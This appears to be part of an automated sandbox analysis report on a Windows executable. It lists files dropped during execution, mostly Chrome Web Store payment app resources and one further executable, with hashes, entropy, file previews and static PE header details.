Preview:	{"craw_app_unavailable":{"message":"\u5e94\u7528\u76ee\u524d\u65e0\u6cd5\u4f7f\u7528\u3002"},"craw_connect_to_network":{"message":"\u8bf7\u8fde\u63a5\u5230\u7f51\u7edc\u3002"},"app_name":{"message":"Chrome \u7f51\u4e0a\u5e94\u7528\u5e97\u4ed8\u6b3e\u7cfb\u7edf"},"app_description":{"message":"Chrome \u7f51\u4e0a\u5e94\u7528\u5e97\u4ed8\u6b3e\u7cfb\u7edf"},"iap_unavailable":{"message":"\u76ee\u524d\u65e0\u6cd5\u4f7f\u7528\u5e94\u7528\u5185\u4ed8\u6b3e\u3002"},"please_sign_in":{"message":"\u8bf7\u767b\u5f55 Chrome\u3002"},"jwt_retrieve_failed":{"message":"The transaction could not be completed."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir4584_1631448072\CRX_INSTALL\_locales\zh_TW\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines
Category:	dropped
Size (bytes):	680
Entropy (8bit):	4.916281462386558
Encrypted:	false
SSDEEP:
MD5:	CD30D132A7213FC1B7E03C6D0A49CCF7
SHA1:	1141DED39023B821FE9BB4682E0D1EB5469DAF76
SHA-256:	5717F13D10E63255947F750C79CBB6BD04A6D97A08261E8D5764AF5EB0561A28
SHA-512:	0DCD3CEB93AB58655551B00D7AD4FE4A6F1F6B24EDD31244FF9B57AE529BF1A9E0220A6258C64790F9CC9F026AB9DA3AEE1575809CC94DC4F8754194C958FD19
Malicious:	false
Reputation:	unknown
Preview:	{"craw_app_unavailable":{"message":"\u76ee\u524d\u7121\u6cd5\u4f7f\u7528\u9019\u500b\u61c9\u7528\u7a0b\u5f0f\u3002"},"craw_connect_to_network":{"message":"\u8acb\u9023\u4e0a\u7db2\u8def\u3002"},"app_name":{"message":"Chrome \u7dda\u4e0a\u61c9\u7528\u7a0b\u5f0f\u5546\u5e97\u4ed8\u6b3e\u7cfb\u7d71"},"app_description":{"message":"Chrome \u7dda\u4e0a\u61c9\u7528\u7a0b\u5f0f\u5546\u5e97\u4ed8\u6b3e\u7cfb\u7d71"},"iap_unavailable":{"message":"\u76ee\u524d\u7121\u6cd5\u4f7f\u7528\u61c9\u7528\u7a0b\u5f0f\u5167\u4ed8\u6b3e\u529f\u80fd\u3002"},"please_sign_in":{"message":"\u8acb\u767b\u5165 Chrome\u3002"},"jwt_retrieve_failed":{"message":"The transaction could not be completed."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir4584_1631448072\CRX_INSTALL\_metadata\verified_contents.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	7780
Entropy (8bit):	5.791315351651491
Encrypted:	false
SSDEEP:
MD5:	0834821960CB5C6E9D477AEF649CB2E4
SHA1:	7D25F027D7CEE9E94E9CBDEE1F9220C8D20A1588
SHA-256:	52A24FA2FB3BCB18D9D8571AE385C4A830FF98CE4C18384D40A84EA7F6BA7F69
SHA-512:	9AEAFC3ECE295678242D81D71804E370900A6D4C6A618C5A81CACD869B84346FEAC92189E01718A7BB5C8226E9BE88B063D2ECE7CB0C84F17BB1AF3C5B1A3FC4
Malicious:	false
Reputation:	unknown
Preview:	[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiJfbG9jYWxlcy9iZy9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiZHUtdGRPdUNWcmxDY254Q0poRkg2NXpLU05vb1RiUE56bDNHbzdRMGJ3SSJ9LHsicGF0aCI6Il9sb2NhbGVzL2NhL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJ6ZGtWaF9XdkxJWlhkck5xWHBvSHNRMGh1ZGtSM2d1QlMzb2VsTEZLNklVIn0seyJwYXRoIjoiX2xvY2FsZXMvY3MvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6Ik9nUkNIZlVoam9xOU93NHFfaEhvTTQxNzNMelJyYkVpUVdsRXNRSzhscFkifSx7InBhdGgiOiJfbG9jYWxlcy9kYS9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiN2JVWW1LYkhQUUNRMXBGcmUzTHJySEhwWk9xN1c2Zk5hT0laWmdKUERTTSJ9LHsicGF0aCI6Il9sb2NhbGVzL2RlL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJOV3FkU3Rfc1NFMm9KT2VuSUZtM0pMRm9iOGtBZ3ZTa3RtZGpCRGJWazdBIn0seyJwYXRoIjoiX2xvY2FsZXMvZWwvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6ImgyaEZ0YUJoLXJQUEtoUm00QkFWM0VEZmhFbnh5MElGOVhYT3Z0aHhlNjAifSx7InBhdGgiOiJfbG9jYWxlcy9lbi9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoid0pSZDFmM3NxMERFVTJHLXd

C:\Users\user\AppData\Local\Temp\scoped_dir4584_1631448072\CRX_INSTALL\craw_background.js

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines
Category:	dropped
Size (bytes):	544643
Entropy (8bit):	5.385396177420207
Encrypted:	false
SSDEEP:
MD5:	6EEBED29E6A6301E92A9B8B347807F5F
SHA1:	65DFB69B650560551110B33DCBA50B25E5B876DE
SHA-256:	04CD9494B0ED83924DAD12202630B20D053D9E2819C8E826A386C814CC0A1697
SHA-512:	FEDE6DB31F2AD242E7BC7B52A8859BA7F466A0B920A8DADCB32DCFB5B2A2742E98B767FF22E0C5BC5C11FEC021240AA9E458486C9039EB4EBE5CF6AF7BE97BF2
Malicious:	false
Reputation:	unknown
Preview:	/.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0./.var d,e=e\|\|{};e.scope={};e.arrayIteratorImpl=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};e.arrayIterator=function(a){return{next:e.arrayIteratorImpl(a)}};e.ASSUME_ES5=!1;e.ASSUME_NO_NATIVE_MAP=!1;e.ASSUME_NO_NATIVE_SET=!1;e.SIMPLE_FROUND_POLYFILL=!1;e.ISOLATE_POLYFILLS=!1;e.FORCE_POLYFILL_PROMISE=!1;e.FORCE_POLYFILL_PROMISE_WHEN_NO_UNHANDLED_REJECTION=!1;.e.defineProperty=e.ASSUME_ES5\|\|"function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a};e.getGlobal=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");};e.global=e.getGlobal(this);.e.IS_SYMBOL_NATIVE="func

C:\Users\user\AppData\Local\Temp\scoped_dir4584_1631448072\CRX_INSTALL\craw_window.js

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines
Category:	dropped
Size (bytes):	261316
Entropy (8bit):	5.444466092380538
Encrypted:	false
SSDEEP:
MD5:	1709B6F00A136241185161AA3DF46A06
SHA1:	33DA7D262FFED1A5C2D85B7390E9DBC830CBE494
SHA-256:	5721A4B3F8E09C869A629EFFD350B51C9D46F0AC136717D4DB6265C0EE6F9AC8
SHA-512:	26835B4C050F53AD2DDB84469DF9A84BBB2786A655AB52DFC20B54BEDCB81D1ECD789198D5B7D8B940242E5CEAC818A177444D402397AE82C203438C4B1D19CB
Malicious:	false
Reputation:	unknown
Preview:	/.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0./.var b,k=k\|\|{};k.scope={};k.createTemplateTagFirstArg=function(a){return a.raw=a};k.createTemplateTagFirstArgWithRaw=function(a,c){a.raw=c;return a};k.arrayIteratorImpl=function(a){var c=0;return function(){return c<a.length?{done:!1,value:a[c++]}:{done:!0}}};k.arrayIterator=function(a){return{next:k.arrayIteratorImpl(a)}};k.makeIterator=function(a){var c="undefined"!=typeof Symbol&&Symbol.iterator&&a[Symbol.iterator];return c?c.call(a):k.arrayIterator(a)};.k.arrayFromIterator=function(a){for(var c,d=[];!(c=a.next()).done;)d.push(c.value);return d};k.arrayFromIterable=function(a){return a instanceof Array?a:k.arrayFromIterator(k.makeIterator(a))};k.ASSUME_ES5=!1;k.ASSUME_NO_NATIVE_MAP=!1;k.ASSUME_NO_NATIVE_SET=!1;k.SIMPLE_FROUND_POLYFILL=!1;k.ISOLATE_POLYFILLS=!1;k.FORCE_POLYFILL_PROMISE=!1;k.FORCE_POLYFILL_PROMISE_WHEN_NO_UNHANDLED_REJECTION=!1;.k.objectCreate=k.ASSUME_ES5\|\|"function"==typeof Object.cre

C:\Users\user\AppData\Local\Temp\scoped_dir4584_1631448072\CRX_INSTALL\css\craw_window.css

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	1741
Entropy (8bit):	4.912380256743454
Encrypted:	false
SSDEEP:
MD5:	67BF9AABE17541852F9DDFF8245096CD
SHA1:	A4AC74DD258E8E0689034FAA1B15A5C7C56DC3BB
SHA-256:	10DFBD2D98950B79EE12F6B8E3885AABE31543048DE56AD4FC0A5E34D0D9D4EC
SHA-512:	298FA132C6F122798FDB9BC6DE8024915147ADC20355B56A92F0ED9ACCE4549BE6E7F42212E07DCA166E31624D4E66E299565845D4BA1C51CA935050641B61FE
Malicious:	false
Reputation:	unknown
Preview:	html, body {. margin: 0;. overflow: hidden;.}..webview {. width: 100%;. height: 100%;. min-height: 100%;. position: absolute;.}...craw_overlay {. position: absolute;.. left: 0;. top: 0;. right: 0;. bottom: 0;.. background-color: white;.. -webkit-transition: opacity 250ms linear;.. display: -webkit-flex;. -webkit-flex-direction: column;. -webkit-flex: 1 0%;. -webkit-align-items: center;. -webkit-justify-content: center;.. -webkit-app-region: drag;.}...craw_overlay img {. margin: 16px;.}..#loading_overlay {. opacity: 1;.}..#offline_overlay {. opacity: 0;. display: none;.}..#offline_overlay > img {. -webkit-filter: saturate(0%);.}..#offline_overlay > span {. font-family: 'Open Sans', 'Deja Vu Sans', Arial, sans-serif;. font-size: 15px;. line-height: 21px;. color: #8d8d8d;. display: block;.}..#loading_splash {. width: 128px;. height: 128px;.}..#drag_overlay {. position: absolute;. left: 0;. top: 0;. right: 0;. bottom: 0;. pointer-events: none;. -webkit

C:\Users\user\AppData\Local\Temp\scoped_dir4584_1631448072\CRX_INSTALL\html\craw_window.html

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	810
Entropy (8bit):	4.723481385335562
Encrypted:	false
SSDEEP:
MD5:	34A839BC40DEBC746BBD181D9EF9310C
SHA1:	8B4EAA74D31EED5B0BABA3CA5460201F6B10DA46
SHA-256:	BB8742615E4CD996AE5D0200E443AE6A6F0B473255F03AFFDB8FB4660DE4554D
SHA-512:	EE81E5509CBC2CB2B6C834224688C1E1B1AA9AA3866C52F8EAED040D5C390653C52D8D681E2E2CF62906643962ABAC823D5B622385B983B21E0DCCAFDF281EFF
Malicious:	false
Reputation:	unknown
Preview:	<!DOCTYPE html>.<html>. <head>. <link href="/css/craw_window.css" rel="stylesheet">. <script src="/craw_window.js"></script>. </head>. <body>. <webview></webview>. <div class="craw_overlay" id="loading_overlay">. <img src="/images/icon_128.png" />. <img src="/images/flapper.gif" />. </div>. <div class="craw_overlay" id="offline_overlay">. <img src="/images/icon_128.png" />. <span id="app_unavailable"></span>. <span id="connect_to_network"></span>. </div>. <div id="drag_overlay"></div>. <div id="top_bar">. <div id='close_button'>. <img src='/images/topbar_floating_button_close.png'/>. </div>. <div id='maximize_button'>. <img src='/images/topbar_floating_button_maximize.png'/>. </div>. </div>. </body>.</html>.

C:\Users\user\AppData\Local\Temp\scoped_dir4584_1631448072\CRX_INSTALL\images\flapper.gif

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	GIF image data, version 89a, 30 x 30
Category:	dropped
Size (bytes):	70364
Entropy (8bit):	7.119902236613185
Encrypted:	false
SSDEEP:
MD5:	398ABB308EEBC355DA70BCE907B22E29
SHA1:	CFFB77B8A1724B8F81D98C6D6AD0071D10162252
SHA-256:	2B73533F47A99FFEA9CC405FFAFA9C4C53623F62487AEBFBA415945120B22040
SHA-512:	FC7A56FC8A61A582161874B54ADBAD30A84840190008EDB0B6FBF84F91393CA58E988E3FE446F11A0C3C691C18249B93AEC2904B3D0C4F0857D79034F662385A
Malicious:	false
Reputation:	unknown
Preview:	GIF89a.......................................................!.......!..NETSCAPE2.0.....,.............9.:.h0.bT(6.!l.&..("gk..JL1.[....o. .(:..B(.6."...Z.CUyh0.....j.C.z8..S....2.T'...Q..4 g\|]$ueW.NyQ.IoL!AoF#9h>7.0t..%..,.@.m4..7..!.......,.............9.:.h0.bT(6.!l.&..("gk..JL1.[....o. .(:..B(.6."...Z.CUyh0.....j.C.z8..S....2.T'...Q..4 g\|]$ueW.NyQ.IoL!AoF#9h>7.0t..%..,.@.m4..7..!.......,............................................................................................................'..w=.....\.)._6.k..OF...n.#\~"....2b3..I.)..eu.Q.`.e......gr.?>.s.I0.....@.~.Tr.[8.+.,.;..EE....S.*f.....,.....B8/D..;.9.q......ukC...r.I.....j......BGY...o2J....+O4....X4.....cH%7....I.....0H!.!.....!.,.............................................................................................................................................................................................................p8.a$....hh@.4....X,A.0L..(....JX.j...,..........z.X.Q....jB.d....B..

C:\Users\user\AppData\Local\Temp\scoped_dir4584_1631448072\CRX_INSTALL\images\icon_128.png

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	4364
Entropy (8bit):	7.915848007375225
Encrypted:	false
SSDEEP:
MD5:	4DBC9F9E6F5A08D299BAC9E54DF07694
SHA1:	BB38F5DE34B1E0BE1109220BA55271087A4D9EA5
SHA-256:	91C2718DD23B4356D71F88F6146868369033291086DF327534546DFA459BEB0E
SHA-512:	A5F2B1F47502836130D8083F757B7773C1E1CB36B76AD298CC29AB2B428C8002D2F15BD839838FC326DAC3681C2F48AB25A3E7631D33726C4B25E8EC14170912
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR..............>a.....IDATx..yp.....gF#.:,[H.l.l..8...`/.k....,!a7Km...E...Te..T.....J...p....%.(....+...3....eY.e...L.o...5....h4...\....{?....~.u.`0.....`0.....`0.....`.Y......[(.......).4....ai..w38.+....Bf././..]...{......8...3.....3W~OJ.. /...u6V.C..U.0.+._=.c..9.X.?....L....S@.L...m.0..>.C...L\|TF.p5..f4M.,.V....8..a.<...RP..@)E,..E"...h.....!...-....,I..T..........m..._[[{w{{....{.^......M.x..h4.h.....\.R.E....j).7.....h4.A.E....,. ...iii.Vj?2...=/.B.FK9P..@)=Rj..D".Y...2.B..x.}0...&J...2.......f.O..e.H.....!.J)'I..R....B............QJ;K..L...L.l".L~mhh.R.@).FFF~.L&...~.B.......u.........}.....~.....f..yUU...........^M...6......].,w.e..~.!$.C.R.....E(%e9.,....k..@...W8.........@...........O..@%.~..@.S..P.....`Tp...."...?ME..c......s...`..S1...7.b..aNE..k...3.yP.}.Ch.}......B..........IPE..C.<....T....k......Z..o_......g........P..A=y.J.)h..@.q.-.].AU.4...F.M.....y%B]+ .\.~..9......:..=...r.....E].o...F..P........i...\|....

C:\Users\user\AppData\Local\Temp\scoped_dir4584_1631448072\CRX_INSTALL\images\icon_16.png

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	558
Entropy (8bit):	7.505638146035601
Encrypted:	false
SSDEEP:
MD5:	FB9C46EA81AD3E456D90D58697C12C06
SHA1:	5FC450F7D73CCFAC8F0D818CB3392BA4D91B69DE
SHA-256:	016CA659BA080E194FBFC0929602B16506ED60AA6019FAA51410C4FD93B583E8
SHA-512:	ADD810EE9EB7CAEC505B5FD90A1F184CE39D8F8C689DCC240F188FE353B9575489492E07D572A3B1C11A1555CE66AFCA5134903E4C1AA3D54BC7C5ED3E65B50C
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR................a....IDAT8...Mk.Q...;... .....F..QW.....F....J.?.w..7~......'.Q..B]... .QS...M&_w..b&.\|`......p...f.?.D$.y^..........y...\..Z..t6..oRj.@&.u..G.qN).t.-V.>(.N.Ep]wFk.60o.]0.`Y..cT..Y.Tb.`DF.d..s.Z..E..9.4._C.._...%..*.^....4.l...Y..X..R..../...Wj+w0[.].._B.k.${.\.>.%...........lz .w.ALxo.2;..a...".p..S..&..uXS...<..6..[..zD.._.N+w.WbM7ye6X<...'(,=.r}........$f..5..P....k..."..8.s.<zgSm@.....).Y.....:e..\|.....F...I..A$.....T?.....m....8.........N...z.....V..vd.h'....C.?.....H.;]..C.M.....9.b......IEND.B`.

C:\Users\user\AppData\Local\Temp\scoped_dir4584_1631448072\CRX_INSTALL\images\topbar_floating_button.png

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	160
Entropy (8bit):	5.475799237015411
Encrypted:	false
SSDEEP:
MD5:	8803665A6328D23CC1014A7B0E9BE295
SHA1:	9DA6EE729D5A6E9F30658B8EC954710F107A641F
SHA-256:	D5F9234DC36E7FFA85F35B2359A4F82276F8395EFA76E4553507EA990B27FC6C
SHA-512:	ECD9E71B8BA1ED8BD4CA5A0936CB66A83611C4ABCBDA76C250F4CDF4AD80320212E8F5EEB79A38910718F8346ECC1AD580A3FA835EC2B22BE497F36899FB5930
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<...BIDATx...Q..0......2...(p...~Z.}'.>I%O...V!s..................../...`.<..`.....IEND.B`.

C:\Users\user\AppData\Local\Temp\scoped_dir4584_1631448072\CRX_INSTALL\images\topbar_floating_button_close.png

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	252
Entropy (8bit):	6.512071394066515
Encrypted:	false
SSDEEP:
MD5:	0599DFD9107C7647F27E69331B0A7D75
SHA1:	3198C0A5F34DB67F91A0035DBC297354CBC95525
SHA-256:	131817CD9311C03DF22D769DD2AD7FA2E6E9558863A89F7E5E1657424031A937
SHA-512:	0076ACB9D6A886BD987876E49495038F9388B292A9EFE5C9093CCA64CA3692E3A5D24E35172C7697F6AAE34B86CA217EE59C003423E46D9499BD27EC7D77A649
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx...... ..Pp.X....H...b@...\|.^LC_.E.BP+......X.P..........q..~..p/. ..s.....%D^...$......@.!...<...).?.4{.k.G3...4..[cH..0..l.8.!r..m.R..{..........`.f...#.x.....IEND.B`.

C:\Users\user\AppData\Local\Temp\scoped_dir4584_1631448072\CRX_INSTALL\images\topbar_floating_button_hover.png

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	160
Entropy (8bit):	5.423186859407619
Encrypted:	false
SSDEEP:
MD5:	7CB6B9DC1A30F63B8BD976924B75AD96
SHA1:	0C40B0C496D2F2B5F2021C117EC8610AC03AB469
SHA-256:	721B7AAA9A42A54A349881615A12E3A26983ACA48E173FD2F66E66AA0D725735
SHA-512:	4764937364E355956B242B84010AC56102536D2AACBE4227F0E88E4DE7AB468571957EA6C33012539156E5349AE4F777115615AE3361F60ADDF9CD227424F76A
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<...BIDATx...A..0...+B.z.s...*.....$.<u..[...................h.......C.CA).....IEND.B`.

C:\Users\user\AppData\Local\Temp\scoped_dir4584_1631448072\CRX_INSTALL\images\topbar_floating_button_maximize.png

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	166
Entropy (8bit):	5.8155898293424775
Encrypted:	false
SSDEEP:
MD5:	232CE72808B60CBE0F4FA788A76523DF
SHA1:	721A9C98C835D2CD734153BBE07833C6637ECD68
SHA-256:	AFA4EA944CBDEC8543242E627EF46D5BFD3766DCAC664E7E50CDEEF2B352740C
SHA-512:	4048EEA5A78DD569521C488C4CE4F7B77AC0454C92EE9107A81A1B3AF91A4EE036039AC1A0A6B8DD26B12E7F1595DB80B7FAA7B6A25D9032BF385528A81A8654
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<...HIDATx......0.CQS.......~..."..........m.v+Sq....<!...M8m...'...@$..0....E........IEND.B`.

C:\Users\user\AppData\Local\Temp\scoped_dir4584_1631448072\CRX_INSTALL\images\topbar_floating_button_pressed.png

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	160
Entropy (8bit):	5.46068685940762
Encrypted:	false
SSDEEP:
MD5:	E0862317407F2D54C85E12945799413B
SHA1:	FA557F8F761A04C41C9A4BA81994E43C6C275DBB
SHA-256:	5C10CE0589EB115600F77381130B70AE0B7B3752614D86D4C89E857658AA222B
SHA-512:	07CB69327961FD0019BEF8EF7590B5524905AC373A815F73F6D9E0B26840929F919A96CAA977D4B5656704DACD0F352D568FB3997F80EE6BB94C95B58839DBFE
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<...BIDATx...A..0...+B..@wu...*.....$.<u..[...................h.........M..x(....IEND.B`.

C:\Users\user\AppData\Local\Temp\scoped_dir4584_1631448072\CRX_INSTALL\manifest.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1322
Entropy (8bit):	5.449026004350873
Encrypted:	false
SSDEEP:
MD5:	01334FB9D092AF2AA46C4185E405C627
SHA1:	47AD3C0E82362FFE5B881DF8D71D6F79AB7F5796
SHA-256:	F52714812D68C577A445169D11E84DF6751C2D6886BC429643072BB5D61C6C27
SHA-512:	888D96ADB7A847ABE472145258C8C46950EB2FA3BA7D596C2E90A17C8FB06FD0155C56CC8ABA5D076D89368417464BCB2D236F9E40E53241950A01F9F8ED548F
Malicious:	false
Reputation:	unknown
Preview:	{.. "app": {.. "background": {.. "scripts": [ "craw_background.js" ].. }.. },.. "default_locale": "en",.. "description": "__MSG_APP_DESCRIPTION__",.. "display_in_launcher": false,.. "display_in_new_tab_page": false,.. "icons": {.. "128": "images/icon_128.png",.. "16": "images/icon_16.png".. },.. "key": "MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCrKfMnLqViEyokd1wk57FxJtW2XXpGXzIHBzv9vQI/01UsuP0IV5/lj0wx7zJ/xcibUgDeIxobvv9XD+zO1MdjMWuqJFcKuSS4Suqkje6u+pMrTSGOSHq1bmBVh0kpToN8YoJs/P/yrRd7FEtAXTaFTGxQL4C385MeXSjaQfiRiQIDAQAB",.. "manifest_version": 2,.. "minimum_chrome_version": "29",.. "name": "__MSG_APP_NAME__",.. "oauth2": {.. "auto_approve": true,.. "client_id": "203784468217.apps.googleusercontent.com",.. "scopes": [ "https://www.googleapis.com/auth/sierra", "https://www.googleapis.com/auth/sierrasandbox", "https://www.googleapis.com/auth/chromewebstore", "https://www.googleapis.com/auth/chromewebstore.readonly" ].. },.

C:\Users\user\TypeRes\DllResource.exe

Download File

Process:	C:\Program Files (x86)\Company\NewProduct\ordo_sec666.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1810960
Entropy (8bit):	7.956922547006569
Encrypted:	false
SSDEEP:
MD5:	63FD052610279F9EB9F1FEE8E262F2A4
SHA1:	AAC344ED6F54C367BE51EFFBF6E84128EE8C6992
SHA-256:	955C265A378008EFEE8F0D19C2880D1026F32F7CD6325E0AB1A24C833905BBBA
SHA-512:	234BC89538336452938FBE1E6774F5F7CA47C735F871AC3BA54A3EA6B68C48970FC53239EA72D5CA176F3ACC00932E479020C38CAD66A0F70A3ACDA5B5AFF9B9
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........\.u.\.u.\.u.3...T.u.3.....u.U...Y.u.\.t..u.3...S.u.3...].u.\...Z.u.3...].u.Rich\.u.........................PE..L...\|..X............................`R............@.................................u.......................................d...<.......(............................................................*..@...............8............................text............................... ..`.data....;..........................@....rsrc...(...........................@..@........................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.964446945543999
TrID:	Win32 Executable (generic) a (10002005/4) 99.24% InstallShield setup (43055/19) 0.43% Win32 Executable Delphi generic (14689/80) 0.15% Windows Screen Saver (13104/52) 0.13% Win16/32 Executable Delphi generic (2074/23) 0.02%
File name:	9n6ctoq7cn.exe
File size:	2700879
MD5:	1d1c4639ec7bd10badd41968bc0ff797
SHA1:	ab1146f9ac9bbe1580be4f16c1548a2600075ba9
SHA256:	bdbd5a0fb6a3ab99f0cfa3cee7e3f7f8f7ec078eeb628aadfb8a32a5df2be3b9
SHA512:	1b3da0307716f29cd2ec969160f1965949e059cf093cbd37cd411d923f8e8bcfe07bf944176e7a18eb8414046c805934f827e0f5cf57afced8c86978cce8e2a5
SSDEEP:	49152:pAI+FNpJc7YrEa2u2h9swu+AU3Z9CcVL2wD+aRpXPaAt1DD4VR+Wg:pAI+/c8rHJ2jHxZYOTDrRxaAt1DEVwWg
TLSH:	DAC53335F182803FC1231E35455786B2753DF90C0F7A28DABFDE1E69491728A2E652BB
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	a2a0b496b2caca72

Static PE Info

General

Entrypoint:	0x425468
Entrypoint Section:	CODE
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics:
Time Stamp:	0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	c9adc83b45e363b21cd6b11b5da0501f

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFF0h
mov eax, 00425388h
call 00007F4C79297E59h
mov eax, 004254C8h
call 00007F4C7929A85Fh
mov edx, dword ptr [00428840h]
mov dword ptr [edx], eax
mov edx, dword ptr [00428840h]
mov edx, dword ptr [edx]
mov eax, dword ptr [00428848h]
call 00007F4C792B6019h
mov edx, dword ptr [00428840h]
mov edx, dword ptr [edx]
mov eax, dword ptr [004287DCh]
call 00007F4C792AF0AFh
mov eax, dword ptr [00428840h]
call 00007F4C7929DAE1h
call 00007F4C79296D14h
add byte ptr [eax], al
add bh, bh

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2b000	0x1798	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x31000	0x1cdc	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x2f000	0x1884	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x2e000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
CODE	0x1000	0x244cc	0x24600	False	0.5598689862542955	data	6.5944280484489814	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
DATA	0x26000	0x2894	0x2a00	False	0.31556919642857145	data	3.7937570409882295	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
